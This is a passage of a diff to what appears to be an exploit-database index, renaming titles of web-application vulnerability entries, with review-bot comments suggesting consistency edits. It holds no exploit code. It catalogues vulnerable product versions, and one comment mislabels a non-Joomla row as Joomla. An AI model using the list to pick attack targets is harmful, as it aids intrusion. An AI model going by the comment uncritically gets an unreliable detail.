+7068,platforms/php/webapps/7068.txt,"Mole Group Airline Ticket Script - Authentication Bypass",2008-11-08,Cyber-Zone,php,webapps,0
 7069,platforms/php/webapps/7069.txt,"V3 Chat Live Support 3.0.4 - Insecure Cookie Handling",2008-11-08,Cyber-Zone,php,webapps,0
 7070,platforms/php/webapps/7070.txt,"Zeeways PHOTOVIDEOTUBE 1.1 - Authentication Bypass",2008-11-08,Stack,php,webapps,0
-7071,platforms/php/webapps/7071.txt,"ExoPHPDesk 1.2 Final - (Authentication Bypass) SQL Injection",2008-11-09,Cyber-Zone,php,webapps,0
-7072,platforms/php/webapps/7072.txt,"ZEEMATRI 3.0 - (bannerclick.php adid) SQL Injection",2008-11-09,"Hussin X",php,webapps,0
+7071,platforms/php/webapps/7071.txt,"ExoPHPDesk 1.2 Final - Authentication Bypass",2008-11-09,Cyber-Zone,php,webapps,0
+7072,platforms/php/webapps/7072.txt,"ZEEMATRI 3.0 - 'adid' Parameter SQL Injection",2008-11-09,"Hussin X",php,webapps,0
 7074,platforms/php/webapps/7074.txt,"X10media Mp3 Search Engine 1.6 - Remote File Disclosure",2008-11-09,THUNDER,php,webapps,0
 7075,platforms/jsp/webapps/7075.txt,"Openfire Server 3.6.0a - Authentication Bypass / SQL Injection / Cross-Site Scripting",2008-11-09,"Andreas Kurtz",jsp,webapps,0
 7076,platforms/php/webapps/7076.txt,"Collabtive 0.4.8 - Cross-Site Scripting / Authentication Bypass / Arbitrary File Upload",2008-11-10,USH,php,webapps,0
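Review bot: The normalisation in this hunk stops short: 7048 is moved to the `'cat_id' Parameter SQL Injection` form, but the two context rows directly below it, 7050 `E-topbiz Number Links 1 - 'id' SQL Injection` and 7052 `Domain Seller Pro 1.5 - 'id' SQL Injection`, keep the old `'id' SQL Injection` wording, so the same pattern is now spelled two ways within five lines. Renaming them to `"E-topbiz Number Links 1 - 'id' Parameter SQL Injection"` and `"Domain Seller Pro 1.5 - 'id' Parameter SQL Injection"` would complete the pass. Rows 7041–7046, 7061, 7067, 7068 and 7071 also lose the `SQL Injection` class and keep only `Authentication Bypass`; 7075 in this same hunk shows the form that retains both, `Authentication Bypass / SQL Injection / Cross-Site Scripting`, and I would use it so the root cause stays searchable.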
@@ -19961,17 +19962,17 @@ id,file,description,date,author,platform,type,port
 7086,platforms/php/webapps/7086.txt,"AJSquare Free Polling Script - (DB) Multiple Vulnerabilities",2008-11-10,G4N0K,php,webapps,0
 7087,platforms/php/webapps/7087.txt,"AJ Auction - Authentication Bypass",2008-11-10,G4N0K,php,webapps,0
 7089,platforms/php/webapps/7089.txt,"Aj Classifieds - Authentication Bypass",2008-11-11,G4N0K,php,webapps,0
-7092,platforms/php/webapps/7092.txt,"Joomla! Component com_books - (book_id) SQL Injection",2008-11-11,boom3rang,php,webapps,0
+7092,platforms/php/webapps/7092.txt,"Joomla! Component com_books - 'book_id' Parameter SQL Injection",2008-11-11,boom3rang,php,webapps,0
 7093,platforms/php/webapps/7093.txt,"Joomla! Component Contact Info 1.0 - SQL Injection",2008-11-11,boom3rang,php,webapps,0
 7094,platforms/php/webapps/7094.txt,"Pre Real Estate Listings - Arbitrary File Upload",2008-11-11,BackDoor,php,webapps,0
-7095,platforms/php/webapps/7095.txt,"Joomla! / Mambo Component 'com_catalogproduction' - 'id' SQL Injection",2008-11-11,boom3rang,php,webapps,0
+7095,platforms/php/webapps/7095.txt,"Joomla! / Mambo Component com_catalogproduction - 'id' Parameter SQL Injection",2008-11-11,boom3rang,php,webapps,0
 7096,platforms/php/webapps/7096.txt,"Joomla! Component Simple RSS Reader 1.0 - Remote File Inclusion",2008-11-11,NoGe,php,webapps,0
 7097,platforms/php/webapps/7097.txt,"Joomla! Component com_marketplace 1.2.1 - 'catid' SQL Injection",2008-11-11,TR-ShaRk,php,webapps,0
-7098,platforms/php/webapps/7098.txt,"PozScripts Business Directory Script - 'cid' SQL Injection",2008-11-11,"Hussin X",php,webapps,0
+7098,platforms/php/webapps/7098.txt,"PozScripts Business Directory Script - 'cid' Parameter SQL Injection",2008-11-11,"Hussin X",php,webapps,0
 7101,platforms/php/webapps/7101.txt,"Alstrasoft SendIt Pro - Arbitrary File Upload",2008-11-12,ZoRLu,php,webapps,0
 7102,platforms/php/webapps/7102.txt,"Alstrasoft Article Manager Pro 1.6 - Authentication Bypass",2008-11-12,ZoRLu,php,webapps,0
-7103,platforms/php/webapps/7103.txt,"Alstrasoft Web Host Directory - (Authentication Bypass) SQL Injection",2008-11-12,ZoRLu,php,webapps,0
-7105,platforms/php/webapps/7105.txt,"Quick Poll Script - 'code.php id' SQL Injection",2008-11-12,"Hussin X",php,webapps,0
+7103,platforms/php/webapps/7103.txt,"Alstrasoft Web Host Directory - Authentication Bypass",2008-11-12,ZoRLu,php,webapps,0
+7105,platforms/php/webapps/7105.txt,"Quick Poll Script - 'id' Parameter SQL Injection",2008-11-12,"Hussin X",php,webapps,0
 7106,platforms/php/webapps/7106.txt,"TurnkeyForms Local Classifieds - Authentication Bypass",2008-11-12,G4N0K,php,webapps,0
 7107,platforms/php/webapps/7107.txt,"TurnkeyForms Web Hosting Directory - Multiple Vulnerabilities",2008-11-12,G4N0K,php,webapps,0
 7110,platforms/php/webapps/7110.txt,"ScriptsFeed (SF) Real Estate Classifieds Software - Arbitrary File Upload",2008-11-13,ZoRLu,php,webapps,0
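Review bot: Row 7097 `Joomla! Component com_marketplace 1.2.1 - 'catid' SQL Injection` sits between 7095 and 7098, both of which this hunk rewrites to the `'x' Parameter SQL Injection` form, yet it keeps the old wording, so the three Joomla rows in this hunk no longer agree with each other. `"Joomla! Component com_marketplace 1.2.1 - 'catid' Parameter SQL Injection"` would bring it in line. Row 7105 also drops `code.php` when going from `'code.php id'` to `'id' Parameter`, which removes the only hint of which script is affected; keeping the file name alongside the parameter would preserve that.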
@@ -19983,23 +19984,23 @@ id,file,description,date,author,platform,type,port
 7117,platforms/php/webapps/7117.txt,"GS Real Estate Portal US/International Module - Multiple Vulnerabilities",2008-11-14,ZoRLu,php,webapps,0
 7118,platforms/php/webapps/7118.txt,"TurnkeyForms - Text Link Sales Authentication Bypass",2008-11-14,G4N0K,php,webapps,0
 7119,platforms/php/webapps/7119.php,"Discuz! 6.x/7.x - Remote Code Execution",2008-11-14,80vul,php,webapps,0
-7120,platforms/asp/webapps/7120.txt,"Bankoi Webhost Panel 1.20 - (Authentication Bypass) SQL Injection",2008-11-14,R3d-D3V!L,asp,webapps,0
+7120,platforms/asp/webapps/7120.txt,"Bankoi Webhost Panel 1.20 - Authentication Bypass",2008-11-14,R3d-D3V!L,asp,webapps,0
 7121,platforms/php/webapps/7121.pl,"SlimCMS 1.0.0 - 'edit.php' SQL Injection",2008-11-14,StAkeR,php,webapps,0
 7122,platforms/php/webapps/7122.txt,"GS Real Estate Portal - Multiple SQL Injections",2008-11-14,InjEctOr5,php,webapps,0
 7123,platforms/php/webapps/7123.txt,"X7 Chat 2.0.5 - Authentication Bypass",2008-11-14,ZoRLu,php,webapps,0
 7124,platforms/php/webapps/7124.txt,"TurnkeyForms Text Link Sales - 'id' Cross-Site Scripting / SQL Injection",2008-11-14,ZoRLu,php,webapps,0
 7128,platforms/php/webapps/7128.txt,"ClipShare Pro 2006-2007 - 'chid' Parameter SQL Injection",2008-11-15,snakespc,php,webapps,0
-7130,platforms/php/webapps/7130.php,"Minigal b13 - 'index.php list' Remote File Disclosure",2008-11-15,"Alfons Luja",php,webapps,0
-7131,platforms/php/webapps/7131.txt,"yahoo answers - 'id' SQL Injection",2008-11-16,snakespc,php,webapps,0
+7130,platforms/php/webapps/7130.php,"Minigal b13 - Remote File Disclosure",2008-11-15,"Alfons Luja",php,webapps,0
+7131,platforms/php/webapps/7131.txt,"yahoo answers - 'id' Parameter SQL Injection",2008-11-16,snakespc,php,webapps,0
 7133,platforms/php/webapps/7133.txt,"FloSites Blog - Multiple SQL Injections",2008-11-16,Vrs-hCk,php,webapps,0
-7134,platforms/php/webapps/7134.txt,"PHPstore Wholesale - 'track.php?id' SQL Injection",2008-11-16,"Hussin X",php,webapps,0
+7134,platforms/php/webapps/7134.txt,"PHPstore Wholesale - 'id' Parameter SQL Injection",2008-11-16,"Hussin X",php,webapps,0
 7136,platforms/php/webapps/7136.txt,"mxCamArchive 2.2 - Bypass Config Download",2008-11-17,ahmadbady,php,webapps,0
 7137,platforms/asp/webapps/7137.txt,"OpenASP 3.0 - Blind SQL Injection",2008-11-17,StAkeR,asp,webapps,0
-7138,platforms/php/webapps/7138.txt,"E-topbiz ADManager 4 - (group) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0
+7138,platforms/php/webapps/7138.txt,"E-topbiz ADManager 4 - 'group' Parameter Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0
 7140,platforms/php/webapps/7140.txt,"FREEze Greetings 1.0 - Remote Password Retrieve Exploit",2008-11-17,cOndemned,php,webapps,0
 7141,platforms/asp/webapps/7141.txt,"Q-Shop 3.0 - Cross-Site Scripting / SQL Injection",2008-11-17,Bl@ckbe@rD,asp,webapps,0
-7143,platforms/php/webapps/7143.txt,"PHPfan 3.3.4 - (init.php includepath) Remote File Inclusion",2008-11-17,ahmadbady,php,webapps,0
-7144,platforms/php/webapps/7144.txt,"Jadu Galaxies - 'categoryId' Blind SQL Injection",2008-11-17,ZoRLu,php,webapps,0
+7143,platforms/php/webapps/7143.txt,"PHPfan 3.3.4 - 'init.php' Remote File Inclusion",2008-11-17,ahmadbady,php,webapps,0
+7144,platforms/php/webapps/7144.txt,"Jadu Galaxies - 'categoryId' Parameter Blind SQL Injection",2008-11-17,ZoRLu,php,webapps,0
 7146,platforms/php/webapps/7146.txt,"Simple Customer 1.2 - (Authentication Bypass) SQL Injection",2008-11-17,d3b4g,php,webapps,0
 7147,platforms/php/webapps/7147.txt,"SaturnCMS - (view) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0
 7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - 'serverid' Parameter SQL Injection",2008-11-17,eek,php,webapps,0
@@ -20529,7 +20530,7 @@ id,file,description,date,author,platform,type,port
 7849,platforms/php/webapps/7849.txt,"OwnRS Blog 1.2 - (autor.php) SQL Injection",2009-01-22,nuclear,php,webapps,0
 7850,platforms/asp/webapps/7850.txt,"asp-project 1.0 - Insecure Cookie Method",2009-01-22,"Khashayar Fereidani",asp,webapps,0
 7851,platforms/php/webapps/7851.php,"Pardal CMS 0.2.0 - Blind SQL Injection",2009-01-22,darkjoker,php,webapps,0
-7859,platforms/php/webapps/7859.pl,"MemHT Portal 4.0.1 - (avatar) Remote Code Execution",2009-01-25,StAkeR,php,webapps,0
+7859,platforms/php/webapps/7859.pl,"MemHT Portal 4.0.1 - Remote Code Execution",2009-01-25,StAkeR,php,webapps,0
 7860,platforms/php/webapps/7860.php,"Mambo Component 'com_sim' 0.8 - Blind SQL Injection",2009-01-25,"Mehmet Ince",php,webapps,0
 7861,platforms/asp/webapps/7861.txt,"Web-Calendar Lite 1.0 - (Authentication Bypass) SQL Injection",2009-01-25,ByALBAYX,asp,webapps,0
 7862,platforms/php/webapps/7862.txt,"Flax Article Manager 1.1 - 'cat_id' SQL Injection",2009-01-25,JIKO,php,webapps,0
@@ -20668,7 +20669,7 @@ id,file,description,date,author,platform,type,port
 8061,platforms/php/webapps/8061.pl,"simplePms CMS 0.1.4 - Local File Inclusion / Remote Command Execution",2009-02-16,Osirys,php,webapps,0
 8062,platforms/php/webapps/8062.txt,"powermovielist 0.14b - SQL Injection / Cross-Site Scripting",2009-02-16,brain[pillow],php,webapps,0
 8063,platforms/php/webapps/8063.txt,"Novaboard 1.0.0 - Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0
-8064,platforms/php/webapps/8064.pl,"MemHT Portal 4.0.1 - (pvtmsg) Delete All Private Messages Exploit",2009-02-16,StAkeR,php,webapps,0
+8064,platforms/php/webapps/8064.pl,"MemHT Portal 4.0.1 - Delete All Private Messages Exploit",2009-02-16,StAkeR,php,webapps,0
 8065,platforms/asp/webapps/8065.txt,"SAS Hotel Management System - 'myhotel_info.asp' SQL Injection",2009-02-16,Darkb0x,asp,webapps,0
 8066,platforms/php/webapps/8066.txt,"YACS CMS 8.11 - update_trailer.php Remote File Inclusion",2009-02-16,ahmadbady,php,webapps,0
 8068,platforms/php/webapps/8068.txt,"ravennuke 2.3.0 - Multiple Vulnerabilities",2009-02-16,waraxe,php,webapps,0
@@ -20799,7 +20800,7 @@ id,file,description,date,author,platform,type,port
 8330,platforms/php/webapps/8330.txt,"PHPRecipeBook 2.39 - (course_id) SQL Injection",2009-03-31,DarKdewiL,php,webapps,0
 8331,platforms/php/webapps/8331.txt,"vsp stats processor 0.45 - (gamestat.php gameID) SQL Injection",2009-03-31,Dimi4,php,webapps,0
 8334,platforms/php/webapps/8334.txt,"Koschtit Image Gallery 1.82 - Multiple Local File Inclusion",2009-04-01,ahmadbady,php,webapps,0
-8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 - (page) SQL Injection",2009-04-01,cOndemned,php,webapps,0
+8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 - 'page' Parameter SQL Injection",2009-04-01,cOndemned,php,webapps,0
 8342,platforms/php/webapps/8342.txt,"TinyPHPForum 3.61 - File Disclosure / Code Execution",2009-04-01,brain[pillow],php,webapps,0
 8346,platforms/php/webapps/8346.txt,"ActiveKB KnowledgeBase - 'Panel' Parameter Local File Inclusion",2009-04-03,"Angela Chang",php,webapps,0
 8347,platforms/php/webapps/8347.php,"glFusion 1.1.2 - COM_applyFilter()/cookies Blind SQL Injection",2009-04-03,Nine:Situations:Group,php,webapps,0
@@ -20835,7 +20836,7 @@ id,file,description,date,author,platform,type,port
 8396,platforms/php/webapps/8396.pl,"w3bcms Gaestebuch 3.0.0 - Blind SQL Injection",2009-04-10,DNX,php,webapps,0
 8397,platforms/asp/webapps/8397.txt,"FunkyASP AD System 1.1 - Arbitrary File Upload",2009-04-10,ZoRLu,asp,webapps,0
 8399,platforms/php/webapps/8399.pl,"Flatnuke 2.7.1 - (level) Privilege Escalation",2009-04-13,StAkeR,php,webapps,0
-8408,platforms/php/webapps/8408.txt,"X10media Mp3 Search Engine < 1.6.2 Admin Access",2009-04-13,THUNDER,php,webapps,0
+8408,platforms/php/webapps/8408.txt,"X10media Mp3 Search Engine < 1.6.2 - Admin Access",2009-04-13,THUNDER,php,webapps,0
 8409,platforms/php/webapps/8409.txt,"Yellow Duck Weblog 2.1.0 - 'lang' Local File Inclusion",2009-04-13,ahmadbady,php,webapps,0
 8414,platforms/php/webapps/8414.txt,"XEngineSoft PMS/MGS/NM/Ams 1.0 - (Authentication Bypass) SQL Injection",2009-04-13,Dr-HTmL,php,webapps,0
 8415,platforms/php/webapps/8415.txt,"FreznoShop 1.3.0 - 'id' SQL Injection",2009-04-13,NoGe,php,webapps,0
@@ -21086,7 +21087,7 @@ id,file,description,date,author,platform,type,port
 8823,platforms/php/webapps/8823.txt,"212Cafe WebBoard 2.90 Beta - Remote File Disclosure",2009-05-29,MrDoug,php,webapps,0
 8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 - (Authentication Bypass) SQL Injection",2009-05-29,TiGeR-Dz,php,webapps,0
 8827,platforms/php/webapps/8827.txt,"ecshop 2.6.2 - Multiple Remote Command Execution Vulnerabilities",2009-05-29,Securitylab.ir,php,webapps,0
-8828,platforms/php/webapps/8828.txt,"Arab Portal 2.2 - (Authentication Bypass) SQL Injection",2009-05-29,"sniper code",php,webapps,0
+8828,platforms/php/webapps/8828.txt,"Arab Portal 2.2 - Authentication Bypass",2009-05-29,"sniper code",php,webapps,0
 8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - 'maincatid' Parameter SQL Injection",2009-05-29,Br0ly,php,webapps,0
 8830,platforms/php/webapps/8830.txt,"Million Dollar Text Links 1.0 - 'id' SQL Injection",2009-05-29,Qabandi,php,webapps,0
 8831,platforms/php/webapps/8831.txt,"Traidnt Up 2.0 - (Authentication Bypass / Cookie) SQL Injection",2009-05-29,Qabandi,php,webapps,0
@@ -21397,7 +21398,7 @@ id,file,description,date,author,platform,type,port
 9314,platforms/php/webapps/9314.txt,"MUJE CMS 1.0.4.34 - Local File Inclusion",2009-07-30,SirGod,php,webapps,0
 9315,platforms/php/webapps/9315.pl,"PunBB Reputation.php Mod 2.0.4 - Local File Inclusion",2009-07-30,Dante90,php,webapps,0
 9316,platforms/php/webapps/9316.txt,"linkSpheric 0.74b6 - (listID) SQL Injection",2009-07-30,NoGe,php,webapps,0
-9320,platforms/php/webapps/9320.php,"Arab Portal 2.x - (forum.php qc) SQL Injection",2009-08-01,rEcruit,php,webapps,0
+9320,platforms/php/webapps/9320.php,"Arab Portal 2.x - 'forum.php' SQL Injection",2009-08-01,rEcruit,php,webapps,0
 9322,platforms/php/webapps/9322.txt,"MAXcms 3.11.20b - Multiple Remote File Inclusion",2009-08-01,NoGe,php,webapps,0
 9324,platforms/php/webapps/9324.txt,"Joomla! Component com_jfusion - 'itemID' Blind SQL Injection",2009-08-01,"Chip d3 bi0s",php,webapps,0
 9325,platforms/php/webapps/9325.txt,"PortalXP Teacher Edition 1.2 - Multiple SQL Injections",2009-08-01,SirGod,php,webapps,0
@@ -21417,7 +21418,7 @@ id,file,description,date,author,platform,type,port
 9341,platforms/php/webapps/9341.txt,"Questions Answered 1.3 - (Authentication Bypass) SQL Injection",2009-08-03,snakespc,php,webapps,0
 9342,platforms/php/webapps/9342.txt,"elvin bts 1.2.2 - SQL Injection / Cross-Site Scripting",2009-08-03,"599eme Man",php,webapps,0
 9344,platforms/php/webapps/9344.txt,"Multi Website 1.5 - (index PHP action) SQL Injection",2009-08-03,SarBoT511,php,webapps,0
-9347,platforms/php/webapps/9347.txt,"Arab Portal 2.2 - (mod.php module) Local File Inclusion",2009-08-03,Qabandi,php,webapps,0
+9347,platforms/php/webapps/9347.txt,"Arab Portal 2.2 - 'mod.php' Local File Inclusion",2009-08-03,Qabandi,php,webapps,0
 9348,platforms/php/webapps/9348.txt,"Blink Blog System - (Authentication Bypass) SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0
 9349,platforms/php/webapps/9349.txt,"Discloser 0.0.4-rc2 - (index.php more) SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0
 9350,platforms/php/webapps/9350.txt,"MAXcms 3.11.20b - Remote File Inclusion / File Disclosure",2009-08-03,GoLd_M,php,webapps,0
@@ -24104,7 +24105,7 @@ id,file,description,date,author,platform,type,port
 15367,platforms/php/webapps/15367.txt,"Joomla! Component Sponsor Wall 1.1 - SQL Injection",2010-10-31,FL0RiX,php,webapps,0
 15369,platforms/php/webapps/15369.php,"Auto CMS 1.8 - Remote Code Execution",2010-10-31,"Giuseppe D'Inverno",php,webapps,0
 15370,platforms/php/webapps/15370.txt,"XAMPP 1.7.3 - Multiple Vulnerabilities",2010-11-01,TheLeader,php,webapps,0
-15381,platforms/php/webapps/15381.txt,"Collabtive - SQL Injection",2010-11-01,"Anatolia Security",php,webapps,0
+15381,platforms/php/webapps/15381.txt,"Collabtive 0.65 - SQL Injection",2010-11-01,"Anatolia Security",php,webapps,0
 15382,platforms/asp/webapps/15382.txt,"douran portal 3.9.7.55 - Multiple Vulnerabilities",2010-11-01,ITSecTeam,asp,webapps,0
 15385,platforms/php/webapps/15385.txt,"Kandidat CMS 1.4.2 - Persistent Cross-Site Scripting",2010-11-02,"High-Tech Bridge SA",php,webapps,0
 15386,platforms/php/webapps/15386.txt,"MemHT Portal 4.0.1 - Persistent Cross-Site Scripting",2010-11-02,"High-Tech Bridge SA",php,webapps,0
@@ -26559,8 +26560,8 @@ id,file,description,date,author,platform,type,port
 23639,platforms/php/webapps/23639.txt,"Qualiteam X-Cart 3.x - Multiple Remote Information Disclosure Vulnerabilities",2004-02-03,Philip,php,webapps,0
 23640,platforms/php/webapps/23640.txt,"phpMyAdmin 2.x - Export.php File Disclosure",2004-02-03,"Cedric Cochin",php,webapps,0
 23644,platforms/php/webapps/23644.php,"PHPX 3.2.3 - Multiple Vulnerabilities",2004-02-03,"Manuel L?pez",php,webapps,0
-23645,platforms/php/webapps/23645.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - showproduct.php SQL Injection",2004-02-04,G00db0y,php,webapps,0
-23646,platforms/php/webapps/23646.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - showcat.php SQL Injection",2004-02-04,G00db0y,php,webapps,0
+23645,platforms/php/webapps/23645.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - 'showproduct.php' SQL Injection",2004-02-04,G00db0y,php,webapps,0
+23646,platforms/php/webapps/23646.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - 'showcat.php' SQL Injection",2004-02-04,G00db0y,php,webapps,0
 23647,platforms/cgi/webapps/23647.txt,"RXGoogle.CGI 1.0/2.5 - Cross-Site Scripting",2004-02-04,"Shaun Colley",cgi,webapps,0
 23653,platforms/php/webapps/23653.txt,"Crossday Discuz! 2.0/3.0 - Cross-Site Scripting",2004-02-05,"Cheng Peng Su",php,webapps,0
 23657,platforms/php/webapps/23657.txt,"Mambo Open Source 4.6 - Itemid Parameter Cross-Site Scripting",2004-02-05,"David Sopas Ferreira",php,webapps,0
@@ -27329,7 +27330,7 @@ id,file,description,date,author,platform,type,port
 25200,platforms/php/webapps/25200.txt,"PHP Arena PAFileDB 3.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-08,sp3x@securityreason.com,php,webapps,0
 25201,platforms/cgi/webapps/25201.txt,"Newsscript - Access Validation",2005-03-08,adrianc23@gmail.com,cgi,webapps,0
 25206,platforms/php/webapps/25206.txt,"phpoutsourcing zorum 3.5 - Multiple Vulnerabilities",2005-03-10,benjilenoob,php,webapps,0
-25208,platforms/php/webapps/25208.txt,"All Enthusiast PhotoPost PHP Pro 5.0 - adm-photo.php Arbitrary Image Manipulation",2005-03-10,"Igor Franchuk",php,webapps,0
+25208,platforms/php/webapps/25208.txt,"All Enthusiast PhotoPost PHP Pro 5.0 - 'adm-photo.php' Arbitrary Image Manipulation",2005-03-10,"Igor Franchuk",php,webapps,0
 25212,platforms/php/webapps/25212.txt,"UBBCentral UBB.Threads 6.0 - editpost.php SQL Injection",2005-03-11,"ADZ Security Team",php,webapps,0
 25213,platforms/php/webapps/25213.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - viewall.php start Parameter SQL Injection",2005-03-12,sp3x@securityreason.com,php,webapps,0
 25214,platforms/php/webapps/25214.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - category.php start Parameter SQL Injection",2005-03-12,sp3x@securityreason.com,php,webapps,0
@@ -28226,7 +28227,7 @@ id,file,description,date,author,platform,type,port
 27542,platforms/php/webapps/27542.txt,"SoftBiz Image Gallery - mage_desc.php Multiple Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0
 27543,platforms/php/webapps/27543.txt,"SoftBiz Image Gallery - template.php provided Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0
 26408,platforms/php/webapps/26408.txt,"phpEventCalendar 0.2.3 - Multiple Vulnerabilities",2013-06-24,AtT4CKxT3rR0r1ST,php,webapps,0
-26410,platforms/php/webapps/26410.py,"Collabtive 1.0 - (manageuser.php task Parameter) SQL Injection",2013-06-24,drone,php,webapps,0
+26410,platforms/php/webapps/26410.py,"Collabtive 1.0 - 'manageuser.php' SQL Injection",2013-06-24,drone,php,webapps,0
 26414,platforms/php/webapps/26414.txt,"PodHawk 1.85 - Arbitrary File Upload",2013-06-24,"CWH Underground",php,webapps,0
 26415,platforms/hardware/webapps/26415.txt,"Linksys X3000 1.0.03 build 001 - Multiple Vulnerabilities",2013-06-24,m-1-k-3,hardware,webapps,0
 26416,platforms/php/webapps/26416.txt,"Elemata CMS RC3.0 - (global.php id Parameter) SQL Injection",2013-06-24,"CWH Underground",php,webapps,0
@@ -28522,7 +28523,7 @@ id,file,description,date,author,platform,type,port
 26782,platforms/php/webapps/26782.txt,"Scout Portal Toolkit 1.3.1 - 'SPT-AdvancedSearch.php' Cross-Site Scripting",2005-12-12,Preddy,php,webapps,0
 26783,platforms/php/webapps/26783.txt,"Scout Portal Toolkit 1.3.1 - 'SPT-UserLogin.php' SQL Injection",2005-12-12,Preddy,php,webapps,0
 26784,platforms/php/webapps/26784.txt,"BTGrup Admin WebController - SQL Injection",2005-12-12,khc@bsdmail.org,php,webapps,0
-26785,platforms/php/webapps/26785.txt,"Arab Portal 2.0 - Link.php SQL Injection",2005-12-12,stranger-killer,php,webapps,0
+26785,platforms/php/webapps/26785.txt,"Arab Portal 2.0 - 'Link.php' SQL Injection",2005-12-12,stranger-killer,php,webapps,0
 26786,platforms/cgi/webapps/26786.txt,"EveryAuction 1.53 - Auction.pl Cross-Site Scripting",2005-12-13,$um$id,cgi,webapps,0
 26787,platforms/php/webapps/26787.txt,"phpCOIN 1.2.2 - CCFG[_PKG_PATH_DBSE] Remote File Inclusion",2005-12-13,retrogod@aliceposta.it,php,webapps,0
 26788,platforms/php/webapps/26788.txt,"PHPCOIN 1.2.2 - 'includes/db.php $_CCFG[_PKG_PATH_DBSE]' Parameter Traversal Arbitrary File Access",2005-12-13,retrogod@aliceposta.it,php,webapps,0
@@ -29082,8 +29083,8 @@ id,file,description,date,author,platform,type,port
 27497,platforms/php/webapps/27497.txt,"CONTROLzx Hms 3.3.4 - shared_order.php sharedPlanID Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0
 27498,platforms/php/webapps/27498.txt,"CONTROLzx Hms 3.3.4 - dedicated_order.php dedicatedPlanID Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0
 27499,platforms/php/webapps/27499.txt,"CONTROLzx Hms 3.3.4 - server_management.php plan_id Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0
-27500,platforms/php/webapps/27500.txt,"Arab Portal System 2.0 - online.php title Parameter Cross-Site Scripting",2006-03-28,o.y.6,php,webapps,0
-27501,platforms/php/webapps/27501.txt,"Arab Portal System 2.0 - download.php title Parameter Cross-Site Scripting",2006-03-28,o.y.6,php,webapps,0
+27500,platforms/php/webapps/27500.txt,"Arab Portal 2.0 - 'online.php' Cross-Site Scripting",2006-03-28,o.y.6,php,webapps,0
+27501,platforms/php/webapps/27501.txt,"Arab Portal 2.0 - 'download.php' Cross-Site Scripting",2006-03-28,o.y.6,php,webapps,0
 27502,platforms/php/webapps/27502.txt,"Connect Daily 3.2.8/3.2.9 - ViewDay.html Multiple Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0
 27503,platforms/php/webapps/27503.txt,"Connect Daily 3.2.8/3.2.9 - ViewSearch.html Multiple Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0
 27504,platforms/php/webapps/27504.txt,"Connect Daily 3.2.8/3.2.9 - ViewYear.html Multiple Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0
@@ -30127,7 +30128,7 @@ id,file,description,date,author,platform,type,port
 28963,platforms/php/webapps/28963.txt,"Bitweaver 1.x - fisheye/index.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0
 28964,platforms/php/webapps/28964.txt,"Bitweaver 1.x - wiki/orphan_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0
 28965,platforms/php/webapps/28965.txt,"Bitweaver 1.x - wiki/list_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0
-28967,platforms/php/webapps/28967.txt,"ExoPHPDesk 1.2 - Pipe.php Remote File Inclusion",2006-11-11,Firewall1954,php,webapps,0
+28967,platforms/php/webapps/28967.txt,"ExoPHPDesk 1.2 - 'Pipe.php' Remote File Inclusion",2006-11-11,Firewall1954,php,webapps,0
 28970,platforms/php/webapps/28970.txt,"WordPress Plugin Dexs PM System - Authenticated Persistent Cross-Site Scripting",2013-10-15,TheXero,php,webapps,80
 28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - (exportcsv.php sondage Parameter) SQL Injection",2013-10-15,drone,php,webapps,80
 28972,platforms/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection / Remote Code Execution (Metasploit)",2013-10-15,"Jason Kratzer",unix,webapps,0
@@ -31400,7 +31401,7 @@ id,file,description,date,author,platform,type,port
 30940,platforms/asp/webapps/30940.txt,"IPortalX - forum/login_user.asp Multiple Parameter Cross-Site Scripting",2007-12-27,Doz,asp,webapps,0
 30941,platforms/asp/webapps/30941.txt,"IPortalX - blogs.asp Date Parameter Cross-Site Scripting",2007-12-27,Doz,asp,webapps,0
 30945,platforms/php/webapps/30945.txt,"NetBizCity FaqMasterFlexPlus - 'faq.php' Cross-Site Scripting",2007-12-28,"Juan Galiana Lara",php,webapps,0
-30946,platforms/php/webapps/30946.txt,"Collabtive 1.1 - (managetimetracker.php id Parameter) SQL Injection",2014-01-15,"Yogesh Phadtare",php,webapps,80
+30946,platforms/php/webapps/30946.txt,"Collabtive 1.1 - 'managetimetracker.php' SQL Injection",2014-01-15,"Yogesh Phadtare",php,webapps,80
 30947,platforms/php/webapps/30947.txt,"NetBizCity FaqMasterFlexPlus - 'faq.php' SQL Injection",2007-12-28,"Juan Galiana Lara",php,webapps,0
 30948,platforms/php/webapps/30948.txt,"OpenBiblio 0.x - staff_del_confirm.php Multiple Parameter Cross-Site Scripting",2007-12-28,"Juan Galiana Lara",php,webapps,0
 30949,platforms/php/webapps/30949.txt,"OpenBiblio 0.x - theme_del_confirm.php name Parameter Cross-Site Scripting",2007-12-28,"Juan Galiana Lara",php,webapps,0
@@ -32441,7 +32442,7 @@ id,file,description,date,author,platform,type,port
